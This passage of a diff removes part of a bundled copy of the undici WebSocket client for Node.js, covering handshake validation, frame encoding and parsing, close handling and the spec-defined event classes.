// header field to determine which extensions are requested is - // discussed in Section 9.1.) - const secExtension = response.headersList.get('Sec-WebSocket-Extensions') - - if (secExtension !== null && secExtension !== permessageDeflate) { - failWebsocketConnection(ws, 'Received different permessage-deflate than the one set.') - return - } - - // 6. 
If the response includes a |Sec-WebSocket-Protocol| header field - // and this header field indicates the use of a subprotocol that was - // not present in the client's handshake (the server has indicated a - // subprotocol not requested by the client), the client MUST _Fail - // the WebSocket Connection_. - const secProtocol = response.headersList.get('Sec-WebSocket-Protocol') - - if (secProtocol !== null && secProtocol !== request.headersList.get('Sec-WebSocket-Protocol')) { - failWebsocketConnection(ws, 'Protocol was not set in the opening handshake.') - return - } - - response.socket.on('data', onSocketData) - response.socket.on('close', onSocketClose) - response.socket.on('error', onSocketError) - - if (channels.open.hasSubscribers) { - channels.open.publish({ - address: response.socket.address(), - protocol: secProtocol, - extensions: secExtension - }) - } - - onEstablish(response) - } - }) - - return controller -} - -/** - * @param {Buffer} chunk - */ -function onSocketData (chunk) { - if (!this.ws[kByteParser].write(chunk)) { - this.pause() - } -} - -/** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.4 - */ -function onSocketClose () { - const { ws } = this - - // If the TCP connection was closed after the - // WebSocket closing handshake was completed, the WebSocket connection - // is said to have been closed _cleanly_. - const wasClean = ws[kSentClose] && ws[kReceivedClose] - - let code = 1005 - let reason = '' - - const result = ws[kByteParser].closingInfo - - if (result) { - code = result.code ?? 1005 - reason = result.reason - } else if (!ws[kSentClose]) { - // If _The WebSocket - // Connection is Closed_ and no Close control frame was received by the - // endpoint (such as could occur if the underlying transport connection - // is lost), _The WebSocket Connection Close Code_ is considered to be - // 1006. - code = 1006 - } - - // 1. 
Change the ready state to CLOSED (3). - ws[kReadyState] = states.CLOSED - - // 2. If the user agent was required to fail the WebSocket - // connection, or if the WebSocket connection was closed - // after being flagged as full, fire an event named error - // at the WebSocket object. - // TODO - - // 3. Fire an event named close at the WebSocket object, - // using CloseEvent, with the wasClean attribute - // initialized to true if the connection closed cleanly - // and false otherwise, the code attribute initialized to - // the WebSocket connection close code, and the reason - // attribute initialized to the result of applying UTF-8 - // decode without BOM to the WebSocket connection close - // reason. - fireEvent('close', ws, CloseEvent, { - wasClean, code, reason - }) - - if (channels.close.hasSubscribers) { - channels.close.publish({ - websocket: ws, - code, - reason - }) - } -} - -function onSocketError (error) { - const { ws } = this - - ws[kReadyState] = states.CLOSING - - if (channels.socketError.hasSubscribers) { - channels.socketError.publish(error) - } - - this.destroy() -} - -module.exports = { - establishWebSocketConnection -} - - -/***/ }), - -/***/ 9188: -/***/ ((module) => { - -"use strict"; - - -// This is a Globally Unique Identifier unique used -// to validate that the endpoint accepts websocket -// connections. 
-// See https://www.rfc-editor.org/rfc/rfc6455.html#section-1.3 -const uid = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11' - -/** @type {PropertyDescriptor} */ -const staticPropertyDescriptors = { - enumerable: true, - writable: false, - configurable: false -} - -const states = { - CONNECTING: 0, - OPEN: 1, - CLOSING: 2, - CLOSED: 3 -} - -const opcodes = { - CONTINUATION: 0x0, - TEXT: 0x1, - BINARY: 0x2, - CLOSE: 0x8, - PING: 0x9, - PONG: 0xA -} - -const maxUnsigned16Bit = 2 ** 16 - 1 // 65535 - -const parserStates = { - INFO: 0, - PAYLOADLENGTH_16: 2, - PAYLOADLENGTH_64: 3, - READ_DATA: 4 -} - -const emptyBuffer = Buffer.allocUnsafe(0) - -module.exports = { - uid, - staticPropertyDescriptors, - states, - opcodes, - maxUnsigned16Bit, - parserStates, - emptyBuffer -} - - -/***/ }), - -/***/ 2611: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) -const { MessagePort } = __nccwpck_require__(1267) - -/** - * @see https://html.spec.whatwg.org/multipage/comms.html#messageevent - */ -class MessageEvent extends Event { - #eventInit - - constructor (type, eventInitDict = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent constructor' }) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.MessageEventInit(eventInitDict) - - super(type, eventInitDict) - - this.#eventInit = eventInitDict - } - - get data () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.data - } - - get origin () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.origin - } - - get lastEventId () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.lastEventId - } - - get source () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.source - } - - get ports () { - webidl.brandCheck(this, MessageEvent) - - if (!Object.isFrozen(this.#eventInit.ports)) { 
- Object.freeze(this.#eventInit.ports) - } - - return this.#eventInit.ports - } - - initMessageEvent ( - type, - bubbles = false, - cancelable = false, - data = null, - origin = '', - lastEventId = '', - source = null, - ports = [] - ) { - webidl.brandCheck(this, MessageEvent) - - webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent.initMessageEvent' }) - - return new MessageEvent(type, { - bubbles, cancelable, data, origin, lastEventId, source, ports - }) - } -} - -/** - * @see https://websockets.spec.whatwg.org/#the-closeevent-interface - */ -class CloseEvent extends Event { - #eventInit - - constructor (type, eventInitDict = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'CloseEvent constructor' }) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.CloseEventInit(eventInitDict) - - super(type, eventInitDict) - - this.#eventInit = eventInitDict - } - - get wasClean () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.wasClean - } - - get code () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.code - } - - get reason () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.reason - } -} - -// https://html.spec.whatwg.org/multipage/webappapis.html#the-errorevent-interface -class ErrorEvent extends Event { - #eventInit - - constructor (type, eventInitDict) { - webidl.argumentLengthCheck(arguments, 1, { header: 'ErrorEvent constructor' }) - - super(type, eventInitDict) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.ErrorEventInit(eventInitDict ?? 
{}) - - this.#eventInit = eventInitDict - } - - get message () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.message - } - - get filename () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.filename - } - - get lineno () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.lineno - } - - get colno () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.colno - } - - get error () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.error - } -} - -Object.defineProperties(MessageEvent.prototype, { - [Symbol.toStringTag]: { - value: 'MessageEvent', - configurable: true - }, - data: kEnumerableProperty, - origin: kEnumerableProperty, - lastEventId: kEnumerableProperty, - source: kEnumerableProperty, - ports: kEnumerableProperty, - initMessageEvent: kEnumerableProperty -}) - -Object.defineProperties(CloseEvent.prototype, { - [Symbol.toStringTag]: { - value: 'CloseEvent', - configurable: true - }, - reason: kEnumerableProperty, - code: kEnumerableProperty, - wasClean: kEnumerableProperty -}) - -Object.defineProperties(ErrorEvent.prototype, { - [Symbol.toStringTag]: { - value: 'ErrorEvent', - configurable: true - }, - message: kEnumerableProperty, - filename: kEnumerableProperty, - lineno: kEnumerableProperty, - colno: kEnumerableProperty, - error: kEnumerableProperty -}) - -webidl.converters.MessagePort = webidl.interfaceConverter(MessagePort) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.MessagePort -) - -const eventInit = [ - { - key: 'bubbles', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'cancelable', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'composed', - converter: webidl.converters.boolean, - defaultValue: false - } -] - -webidl.converters.MessageEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'data', - converter: webidl.converters.any, - defaultValue: null - }, 
- { - key: 'origin', - converter: webidl.converters.USVString, - defaultValue: '' - }, - { - key: 'lastEventId', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { - key: 'source', - // Node doesn't implement WindowProxy or ServiceWorker, so the only - // valid value for source is a MessagePort. - converter: webidl.nullableConverter(webidl.converters.MessagePort), - defaultValue: null - }, - { - key: 'ports', - converter: webidl.converters['sequence'], - get defaultValue () { - return [] - } - } -]) - -webidl.converters.CloseEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'wasClean', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'code', - converter: webidl.converters['unsigned short'], - defaultValue: 0 - }, - { - key: 'reason', - converter: webidl.converters.USVString, - defaultValue: '' - } -]) - -webidl.converters.ErrorEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'message', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { - key: 'filename', - converter: webidl.converters.USVString, - defaultValue: '' - }, - { - key: 'lineno', - converter: webidl.converters['unsigned long'], - defaultValue: 0 - }, - { - key: 'colno', - converter: webidl.converters['unsigned long'], - defaultValue: 0 - }, - { - key: 'error', - converter: webidl.converters.any - } -]) - -module.exports = { - MessageEvent, - CloseEvent, - ErrorEvent -} - - -/***/ }), - -/***/ 5444: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { maxUnsigned16Bit } = __nccwpck_require__(9188) - -/** @type {import('crypto')} */ -let crypto -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -class WebsocketFrameSend { - /** - * @param {Buffer|undefined} data - */ - constructor (data) { - this.frameData = data - this.maskKey = crypto.randomBytes(4) - } - - createFrame (opcode) { - const bodyLength = this.frameData?.byteLength ?? 
0 - - /** @type {number} */ - let payloadLength = bodyLength // 0-125 - let offset = 6 - - if (bodyLength > maxUnsigned16Bit) { - offset += 8 // payload length is next 8 bytes - payloadLength = 127 - } else if (bodyLength > 125) { - offset += 2 // payload length is next 2 bytes - payloadLength = 126 - } - - const buffer = Buffer.allocUnsafe(bodyLength + offset) - - // Clear first 2 bytes, everything else is overwritten - buffer[0] = buffer[1] = 0 - buffer[0] |= 0x80 // FIN - buffer[0] = (buffer[0] & 0xF0) + opcode // opcode - - /*! ws. MIT License. Einar Otto Stangvik */ - buffer[offset - 4] = this.maskKey[0] - buffer[offset - 3] = this.maskKey[1] - buffer[offset - 2] = this.maskKey[2] - buffer[offset - 1] = this.maskKey[3] - - buffer[1] = payloadLength - - if (payloadLength === 126) { - buffer.writeUInt16BE(bodyLength, 2) - } else if (payloadLength === 127) { - // Clear extended payload length - buffer[2] = buffer[3] = 0 - buffer.writeUIntBE(bodyLength, 4, 6) - } - - buffer[1] |= 0x80 // MASK - - // mask body - for (let i = 0; i < bodyLength; i++) { - buffer[offset + i] = this.frameData[i] ^ this.maskKey[i % 4] - } - - return buffer - } -} - -module.exports = { - WebsocketFrameSend -} - - -/***/ }), - -/***/ 1688: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Writable } = __nccwpck_require__(2781) -const diagnosticsChannel = __nccwpck_require__(7643) -const { parserStates, opcodes, states, emptyBuffer } = __nccwpck_require__(9188) -const { kReadyState, kSentClose, kResponse, kReceivedClose } = __nccwpck_require__(7578) -const { isValidStatusCode, failWebsocketConnection, websocketMessageReceived } = __nccwpck_require__(5515) -const { WebsocketFrameSend } = __nccwpck_require__(5444) - -// This code was influenced by ws released under the MIT license. 
-// Copyright (c) 2011 Einar Otto Stangvik -// Copyright (c) 2013 Arnout Kazemier and contributors -// Copyright (c) 2016 Luigi Pinca and contributors - -const channels = {} -channels.ping = diagnosticsChannel.channel('undici:websocket:ping') -channels.pong = diagnosticsChannel.channel('undici:websocket:pong') - -class ByteParser extends Writable { - #buffers = [] - #byteOffset = 0 - - #state = parserStates.INFO - - #info = {} - #fragments = [] - - constructor (ws) { - super() - - this.ws = ws - } - - /** - * @param {Buffer} chunk - * @param {() => void} callback - */ - _write (chunk, _, callback) { - this.#buffers.push(chunk) - this.#byteOffset += chunk.length - - this.run(callback) - } - - /** - * Runs whenever a new chunk is received. - * Callback is called whenever there are no more chunks buffering, - * or not enough bytes are buffered to parse. - */ - run (callback) { - while (true) { - if (this.#state === parserStates.INFO) { - // If there aren't enough bytes to parse the payload length, etc. 
- if (this.#byteOffset < 2) { - return callback() - } - - const buffer = this.consume(2) - - this.#info.fin = (buffer[0] & 0x80) !== 0 - this.#info.opcode = buffer[0] & 0x0F - - // If we receive a fragmented message, we use the type of the first - // frame to parse the full message as binary/text, when it's terminated - this.#info.originalOpcode ??= this.#info.opcode - - this.#info.fragmented = !this.#info.fin && this.#info.opcode !== opcodes.CONTINUATION - - if (this.#info.fragmented && this.#info.opcode !== opcodes.BINARY && this.#info.opcode !== opcodes.TEXT) { - // Only text and binary frames can be fragmented - failWebsocketConnection(this.ws, 'Invalid frame type was fragmented.') - return - } - - const payloadLength = buffer[1] & 0x7F - - if (payloadLength <= 125) { - this.#info.payloadLength = payloadLength - this.#state = parserStates.READ_DATA - } else if (payloadLength === 126) { - this.#state = parserStates.PAYLOADLENGTH_16 - } else if (payloadLength === 127) { - this.#state = parserStates.PAYLOADLENGTH_64 - } - - if (this.#info.fragmented && payloadLength > 125) { - // A fragmented frame can't be fragmented itself - failWebsocketConnection(this.ws, 'Fragmented frame exceeded 125 bytes.') - return - } else if ( - (this.#info.opcode === opcodes.PING || - this.#info.opcode === opcodes.PONG || - this.#info.opcode === opcodes.CLOSE) && - payloadLength > 125 - ) { - // Control frames can have a payload length of 125 bytes MAX - failWebsocketConnection(this.ws, 'Payload length for control frame exceeded 125 bytes.') - return - } else if (this.#info.opcode === opcodes.CLOSE) { - if (payloadLength === 1) { - failWebsocketConnection(this.ws, 'Received close frame with a 1-byte body.') - return - } - - const body = this.consume(payloadLength) - - this.#info.closeInfo = this.parseCloseBody(false, body) - - if (!this.ws[kSentClose]) { - // If an endpoint receives a Close frame and did not previously send a - // Close frame, the endpoint MUST send a Close frame in 
response. (When - // sending a Close frame in response, the endpoint typically echos the - // status code it received.) - const body = Buffer.allocUnsafe(2) - body.writeUInt16BE(this.#info.closeInfo.code, 0) - const closeFrame = new WebsocketFrameSend(body) - - this.ws[kResponse].socket.write( - closeFrame.createFrame(opcodes.CLOSE), - (err) => { - if (!err) { - this.ws[kSentClose] = true - } - } - ) - } - - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. - this.ws[kReadyState] = states.CLOSING - this.ws[kReceivedClose] = true - - this.end() - - return - } else if (this.#info.opcode === opcodes.PING) { - // Upon receipt of a Ping frame, an endpoint MUST send a Pong frame in - // response, unless it already received a Close frame. - // A Pong frame sent in response to a Ping frame must have identical - // "Application data" - - const body = this.consume(payloadLength) - - if (!this.ws[kReceivedClose]) { - const frame = new WebsocketFrameSend(body) - - this.ws[kResponse].socket.write(frame.createFrame(opcodes.PONG)) - - if (channels.ping.hasSubscribers) { - channels.ping.publish({ - payload: body - }) - } - } - - this.#state = parserStates.INFO - - if (this.#byteOffset > 0) { - continue - } else { - callback() - return - } - } else if (this.#info.opcode === opcodes.PONG) { - // A Pong frame MAY be sent unsolicited. This serves as a - // unidirectional heartbeat. A response to an unsolicited Pong frame is - // not expected. 
- - const body = this.consume(payloadLength) - - if (channels.pong.hasSubscribers) { - channels.pong.publish({ - payload: body - }) - } - - if (this.#byteOffset > 0) { - continue - } else { - callback() - return - } - } - } else if (this.#state === parserStates.PAYLOADLENGTH_16) { - if (this.#byteOffset < 2) { - return callback() - } - - const buffer = this.consume(2) - - this.#info.payloadLength = buffer.readUInt16BE(0) - this.#state = parserStates.READ_DATA - } else if (this.#state === parserStates.PAYLOADLENGTH_64) { - if (this.#byteOffset < 8) { - return callback() - } - - const buffer = this.consume(8) - const upper = buffer.readUInt32BE(0) - - // 2^31 is the maxinimum bytes an arraybuffer can contain - // on 32-bit systems. Although, on 64-bit systems, this is - // 2^53-1 bytes. - // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Invalid_array_length - // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/common/globals.h;drc=1946212ac0100668f14eb9e2843bdd846e510a1e;bpv=1;bpt=1;l=1275 - // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-array-buffer.h;l=34;drc=1946212ac0100668f14eb9e2843bdd846e510a1e - if (upper > 2 ** 31 - 1) { - failWebsocketConnection(this.ws, 'Received payload length > 2^31 bytes.') - return - } - - const lower = buffer.readUInt32BE(4) - - this.#info.payloadLength = (upper << 8) + lower - this.#state = parserStates.READ_DATA - } else if (this.#state === parserStates.READ_DATA) { - if (this.#byteOffset < this.#info.payloadLength) { - // If there is still more data in this chunk that needs to be read - return callback() - } else if (this.#byteOffset >= this.#info.payloadLength) { - // If the server sent multiple frames in a single chunk - - const body = this.consume(this.#info.payloadLength) - - this.#fragments.push(body) - - // If the frame is unfragmented, or a fragmented frame was terminated, - // a message was received - if (!this.#info.fragmented || (this.#info.fin && 
this.#info.opcode === opcodes.CONTINUATION)) { - const fullMessage = Buffer.concat(this.#fragments) - - websocketMessageReceived(this.ws, this.#info.originalOpcode, fullMessage) - - this.#info = {} - this.#fragments.length = 0 - } - - this.#state = parserStates.INFO - } - } - - if (this.#byteOffset > 0) { - continue - } else { - callback() - break - } - } - } - - /** - * Take n bytes from the buffered Buffers - * @param {number} n - * @returns {Buffer|null} - */ - consume (n) { - if (n > this.#byteOffset) { - return null - } else if (n === 0) { - return emptyBuffer - } - - if (this.#buffers[0].length === n) { - this.#byteOffset -= this.#buffers[0].length - return this.#buffers.shift() - } - - const buffer = Buffer.allocUnsafe(n) - let offset = 0 - - while (offset !== n) { - const next = this.#buffers[0] - const { length } = next - - if (length + offset === n) { - buffer.set(this.#buffers.shift(), offset) - break - } else if (length + offset > n) { - buffer.set(next.subarray(0, n - offset), offset) - this.#buffers[0] = next.subarray(n - offset) - break - } else { - buffer.set(this.#buffers.shift(), offset) - offset += next.length - } - } - - this.#byteOffset -= n - - return buffer - } - - parseCloseBody (onlyCode, data) { - // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.5 - /** @type {number|undefined} */ - let code - - if (data.length >= 2) { - // _The WebSocket Connection Close Code_ is - // defined as the status code (Section 7.4) contained in the first Close - // control frame received by the application - code = data.readUInt16BE(0) - } - - if (onlyCode) { - if (!isValidStatusCode(code)) { - return null - } - - return { code } - } - - // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.6 - /** @type {Buffer} */ - let reason = data.subarray(2) - - // Remove BOM - if (reason[0] === 0xEF && reason[1] === 0xBB && reason[2] === 0xBF) { - reason = reason.subarray(3) - } - - if (code !== undefined && !isValidStatusCode(code)) { - return null - } 
- - try { - // TODO: optimize this - reason = new TextDecoder('utf-8', { fatal: true }).decode(reason) - } catch { - return null - } - - return { code, reason } - } - - get closingInfo () { - return this.#info.closeInfo - } -} - -module.exports = { - ByteParser -} - - -/***/ }), - -/***/ 7578: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kWebSocketURL: Symbol('url'), - kReadyState: Symbol('ready state'), - kController: Symbol('controller'), - kResponse: Symbol('response'), - kBinaryType: Symbol('binary type'), - kSentClose: Symbol('sent close'), - kReceivedClose: Symbol('received close'), - kByteParser: Symbol('byte parser') -} - - -/***/ }), - -/***/ 5515: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kReadyState, kController, kResponse, kBinaryType, kWebSocketURL } = __nccwpck_require__(7578) -const { states, opcodes } = __nccwpck_require__(9188) -const { MessageEvent, ErrorEvent } = __nccwpck_require__(2611) - -/* globals Blob */ - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isEstablished (ws) { - // If the server's response is validated as provided for above, it is - // said that _The WebSocket Connection is Established_ and that the - // WebSocket Connection is in the OPEN state. - return ws[kReadyState] === states.OPEN -} - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isClosing (ws) { - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. 
- return ws[kReadyState] === states.CLOSING -} - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isClosed (ws) { - return ws[kReadyState] === states.CLOSED -} - -/** - * @see https://dom.spec.whatwg.org/#concept-event-fire - * @param {string} e - * @param {EventTarget} target - * @param {EventInit | undefined} eventInitDict - */ -function fireEvent (e, target, eventConstructor = Event, eventInitDict) { - // 1. If eventConstructor is not given, then let eventConstructor be Event. - - // 2. Let event be the result of creating an event given eventConstructor, - // in the relevant realm of target. - // 3. Initialize event’s type attribute to e. - const event = new eventConstructor(e, eventInitDict) // eslint-disable-line new-cap - - // 4. Initialize any other IDL attributes of event as described in the - // invocation of this algorithm. - - // 5. Return the result of dispatching event at target, with legacy target - // override flag set if set. - target.dispatchEvent(event) -} - -/** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - * @param {import('./websocket').WebSocket} ws - * @param {number} type Opcode - * @param {Buffer} data application data - */ -function websocketMessageReceived (ws, type, data) { - // 1. If ready state is not OPEN (1), then return. - if (ws[kReadyState] !== states.OPEN) { - return - } - - // 2. 
Let dataForEvent be determined by switching on type and binary type: - let dataForEvent - - if (type === opcodes.TEXT) { - // -> type indicates that the data is Text - // a new DOMString containing data - try { - dataForEvent = new TextDecoder('utf-8', { fatal: true }).decode(data) - } catch { - failWebsocketConnection(ws, 'Received invalid UTF-8 in text frame.') - return - } - } else if (type === opcodes.BINARY) { - if (ws[kBinaryType] === 'blob') { - // -> type indicates that the data is Binary and binary type is "blob" - // a new Blob object, created in the relevant Realm of the WebSocket - // object, that represents data as its raw data - dataForEvent = new Blob([data]) - } else { - // -> type indicates that the data is Binary and binary type is "arraybuffer" - // a new ArrayBuffer object, created in the relevant Realm of the - // WebSocket object, whose contents are data - dataForEvent = new Uint8Array(data).buffer - } - } - - // 3. Fire an event named message at the WebSocket object, using MessageEvent, - // with the origin attribute initialized to the serialization of the WebSocket - // object’s url's origin, and the data attribute initialized to dataForEvent. - fireEvent('message', ws, MessageEvent, { - origin: ws[kWebSocketURL].origin, - data: dataForEvent - }) -} - -/** - * @see https://datatracker.ietf.org/doc/html/rfc6455 - * @see https://datatracker.ietf.org/doc/html/rfc2616 - * @see https://bugs.chromium.org/p/chromium/issues/detail?id=398407 - * @param {string} protocol - */ -function isValidSubprotocol (protocol) { - // If present, this value indicates one - // or more comma-separated subprotocol the client wishes to speak, - // ordered by preference. The elements that comprise this value - // MUST be non-empty strings with characters in the range U+0021 to - // U+007E not including separator characters as defined in - // [RFC2616] and MUST all be unique strings. 
- if (protocol.length === 0) { - return false - } - - for (const char of protocol) { - const code = char.charCodeAt(0) - - if ( - code < 0x21 || - code > 0x7E || - char === '(' || - char === ')' || - char === '<' || - char === '>' || - char === '@' || - char === ',' || - char === ';' || - char === ':' || - char === '\\' || - char === '"' || - char === '/' || - char === '[' || - char === ']' || - char === '?' || - char === '=' || - char === '{' || - char === '}' || - code === 32 || // SP - code === 9 // HT - ) { - return false - } - } - - return true -} - -/** - * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7-4 - * @param {number} code - */ -function isValidStatusCode (code) { - if (code >= 1000 && code < 1015) { - return ( - code !== 1004 && // reserved - code !== 1005 && // "MUST NOT be set as a status code" - code !== 1006 // "MUST NOT be set as a status code" - ) - } - - return code >= 3000 && code <= 4999 -} - -/** - * @param {import('./websocket').WebSocket} ws - * @param {string|undefined} reason - */ -function failWebsocketConnection (ws, reason) { - const { [kController]: controller, [kResponse]: response } = ws - - controller.abort() - - if (response?.socket && !response.socket.destroyed) { - response.socket.destroy() - } - - if (reason) { - fireEvent('error', ws, ErrorEvent, { - error: new Error(reason) - }) - } -} - -module.exports = { - isEstablished, - isClosing, - isClosed, - fireEvent, - isValidSubprotocol, - isValidStatusCode, - failWebsocketConnection, - websocketMessageReceived -} - - -/***/ }), - -/***/ 4284: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) -const { DOMException } = __nccwpck_require__(1037) -const { URLSerializer } = __nccwpck_require__(685) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { staticPropertyDescriptors, states, opcodes, emptyBuffer } = __nccwpck_require__(9188) -const { - kWebSocketURL, - kReadyState, 
- kController, - kBinaryType, - kResponse, - kSentClose, - kByteParser -} = __nccwpck_require__(7578) -const { isEstablished, isClosing, isValidSubprotocol, failWebsocketConnection, fireEvent } = __nccwpck_require__(5515) -const { establishWebSocketConnection } = __nccwpck_require__(5354) -const { WebsocketFrameSend } = __nccwpck_require__(5444) -const { ByteParser } = __nccwpck_require__(1688) -const { kEnumerableProperty, isBlobLike } = __nccwpck_require__(3983) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { types } = __nccwpck_require__(3837) - -let experimentalWarned = false - -// https://websockets.spec.whatwg.org/#interface-definition -class WebSocket extends EventTarget { - #events = { - open: null, - error: null, - close: null, - message: null - } - - #bufferedAmount = 0 - #protocol = '' - #extensions = '' - - /** - * @param {string} url - * @param {string|string[]} protocols - */ - constructor (url, protocols = []) { - super() - - webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket constructor' }) - - if (!experimentalWarned) { - experimentalWarned = true - process.emitWarning('WebSockets are experimental, expect them to change at any time.', { - code: 'UNDICI-WS' - }) - } - - const options = webidl.converters['DOMString or sequence or WebSocketInit'](protocols) - - url = webidl.converters.USVString(url) - protocols = options.protocols - - // 1. Let baseURL be this's relevant settings object's API base URL. - const baseURL = getGlobalOrigin() - - // 1. Let urlRecord be the result of applying the URL parser to url with baseURL. - let urlRecord - - try { - urlRecord = new URL(url, baseURL) - } catch (e) { - // 3. If urlRecord is failure, then throw a "SyntaxError" DOMException. - throw new DOMException(e, 'SyntaxError') - } - - // 4. If urlRecord’s scheme is "http", then set urlRecord’s scheme to "ws". - if (urlRecord.protocol === 'http:') { - urlRecord.protocol = 'ws:' - } else if (urlRecord.protocol === 'https:') { - // 5. 
Otherwise, if urlRecord’s scheme is "https", set urlRecord’s scheme to "wss". - urlRecord.protocol = 'wss:' - } - - // 6. If urlRecord’s scheme is not "ws" or "wss", then throw a "SyntaxError" DOMException. - if (urlRecord.protocol !== 'ws:' && urlRecord.protocol !== 'wss:') { - throw new DOMException( - `Expected a ws: or wss: protocol, got ${urlRecord.protocol}`, - 'SyntaxError' - ) - } - - // 7. If urlRecord’s fragment is non-null, then throw a "SyntaxError" - // DOMException. - if (urlRecord.hash || urlRecord.href.endsWith('#')) { - throw new DOMException('Got fragment', 'SyntaxError') - } - - // 8. If protocols is a string, set protocols to a sequence consisting - // of just that string. - if (typeof protocols === 'string') { - protocols = [protocols] - } - - // 9. If any of the values in protocols occur more than once or otherwise - // fail to match the requirements for elements that comprise the value - // of `Sec-WebSocket-Protocol` fields as defined by The WebSocket - // protocol, then throw a "SyntaxError" DOMException. - if (protocols.length !== new Set(protocols.map(p => p.toLowerCase())).size) { - throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') - } - - if (protocols.length > 0 && !protocols.every(p => isValidSubprotocol(p))) { - throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') - } - - // 10. Set this's url to urlRecord. - this[kWebSocketURL] = new URL(urlRecord.href) - - // 11. Let client be this's relevant settings object. - - // 12. Run this step in parallel: - - // 1. Establish a WebSocket connection given urlRecord, protocols, - // and client. - this[kController] = establishWebSocketConnection( - urlRecord, - protocols, - this, - (response) => this.#onConnectionEstablished(response), - options - ) - - // Each WebSocket object has an associated ready state, which is a - // number representing the state of the connection. Initially it must - // be CONNECTING (0). 
- this[kReadyState] = WebSocket.CONNECTING - - // The extensions attribute must initially return the empty string. - - // The protocol attribute must initially return the empty string. - - // Each WebSocket object has an associated binary type, which is a - // BinaryType. Initially it must be "blob". - this[kBinaryType] = 'blob' - } - - /** - * @see https://websockets.spec.whatwg.org/#dom-websocket-close - * @param {number|undefined} code - * @param {string|undefined} reason - */ - close (code = undefined, reason = undefined) { - webidl.brandCheck(this, WebSocket) - - if (code !== undefined) { - code = webidl.converters['unsigned short'](code, { clamp: true }) - } - - if (reason !== undefined) { - reason = webidl.converters.USVString(reason) - } - - // 1. If code is present, but is neither an integer equal to 1000 nor an - // integer in the range 3000 to 4999, inclusive, throw an - // "InvalidAccessError" DOMException. - if (code !== undefined) { - if (code !== 1000 && (code < 3000 || code > 4999)) { - throw new DOMException('invalid code', 'InvalidAccessError') - } - } - - let reasonByteLength = 0 - - // 2. If reason is present, then run these substeps: - if (reason !== undefined) { - // 1. Let reasonBytes be the result of encoding reason. - // 2. If reasonBytes is longer than 123 bytes, then throw a - // "SyntaxError" DOMException. - reasonByteLength = Buffer.byteLength(reason) - - if (reasonByteLength > 123) { - throw new DOMException( - `Reason must be less than 123 bytes; received ${reasonByteLength}`, - 'SyntaxError' - ) - } - } - - // 3. Run the first matching steps from the following list: - if (this[kReadyState] === WebSocket.CLOSING || this[kReadyState] === WebSocket.CLOSED) { - // If this's ready state is CLOSING (2) or CLOSED (3) - // Do nothing. - } else if (!isEstablished(this)) { - // If the WebSocket connection is not yet established - // Fail the WebSocket connection and set this's ready state - // to CLOSING (2). 
